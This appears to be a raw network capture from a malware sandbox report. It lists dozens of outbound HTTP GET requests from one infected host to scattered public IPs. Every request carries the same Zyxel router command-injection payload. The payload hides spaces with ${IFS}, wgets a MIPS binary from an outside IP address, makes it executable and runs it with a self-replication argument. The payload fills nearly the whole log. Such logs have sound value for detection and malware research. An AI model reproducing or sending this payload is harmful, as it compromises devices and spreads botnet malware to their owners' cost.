                                                Jan 12, 2024 18:24:42.015800953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5923192.168.2.1335832206.48.204.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015889883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5924192.168.2.1354750108.86.182.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.015969992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5925192.168.2.1346712113.234.152.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016062975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5926192.168.2.133854232.42.251.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016161919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5927192.168.2.134940023.189.13.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016221046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5928192.168.2.1334988120.105.79.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016273975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5929192.168.2.133706054.194.230.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016391039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5930192.168.2.1353584221.243.30.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016468048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5931192.168.2.1337760119.208.41.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016531944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5932192.168.2.135973661.149.99.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016608000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5933192.168.2.1341546216.150.155.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016679049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5934192.168.2.134456468.93.212.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016776085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5935192.168.2.1349050128.155.185.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016855001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5936192.168.2.1338120108.9.80.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.016957045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5937192.168.2.135842293.163.13.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017015934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5938192.168.2.134347681.127.29.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017072916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5939192.168.2.134318245.219.119.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017154932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5940192.168.2.136058031.51.152.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017247915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5941192.168.2.133621454.162.121.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017319918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5942192.168.2.134420446.229.78.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017354012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5943192.168.2.1333582221.243.251.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017433882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5944192.168.2.1334804164.79.149.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017503977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5945192.168.2.1333654145.98.68.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017648935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5946192.168.2.1353596141.248.232.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017709017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5947192.168.2.1360808169.120.73.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017805099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5948192.168.2.1345622146.27.189.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017867088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5949192.168.2.1350780193.74.181.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.017945051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5950192.168.2.133663458.224.127.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018019915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5951192.168.2.1337352104.32.113.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018093109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5952192.168.2.134623078.150.162.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018174887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5953192.168.2.1343140151.239.53.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018218040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5954192.168.2.134133432.152.210.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018428087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5955192.168.2.13499162.144.182.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018488884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5956192.168.2.134870665.39.219.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018580914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5957192.168.2.1351996108.157.120.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018666983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5958192.168.2.135949462.99.76.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018701077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5959192.168.2.1350830186.202.222.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018763065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5960192.168.2.1338750146.205.92.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018827915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5961192.168.2.1340484104.237.173.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018899918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5962192.168.2.133989440.246.159.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.018958092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5963192.168.2.134186052.149.169.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019038916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5964192.168.2.136057453.77.236.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019143105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5965192.168.2.134881889.82.89.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019211054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5966192.168.2.1348260154.178.55.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019299030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5967192.168.2.135984097.120.16.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019365072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5968192.168.2.1340648121.126.50.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019434929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5969192.168.2.1337708151.72.74.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019500971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5970192.168.2.1346766207.119.21.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019587994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5971192.168.2.135011487.111.43.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019670963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5972192.168.2.1360746174.91.190.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019737005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5973192.168.2.1355832124.124.108.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019851923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5974192.168.2.134583023.127.22.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019929886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5975192.168.2.1360146111.73.234.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.019982100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5976192.168.2.1334822125.174.24.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020064116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5977192.168.2.133366449.181.133.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020142078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5978192.168.2.1336874183.184.230.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020216942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5979192.168.2.1360206137.199.1.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020292044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5980192.168.2.1337134182.174.6.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020396948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5981192.168.2.135975859.217.149.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020464897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5982192.168.2.1336282157.190.80.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020560026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5983192.168.2.1360142135.240.218.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020642042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5984192.168.2.133303246.10.169.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:42.020733118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5985192.168.2.134704871.214.149.40443
                                                TimestampBytes transferredDirectionData
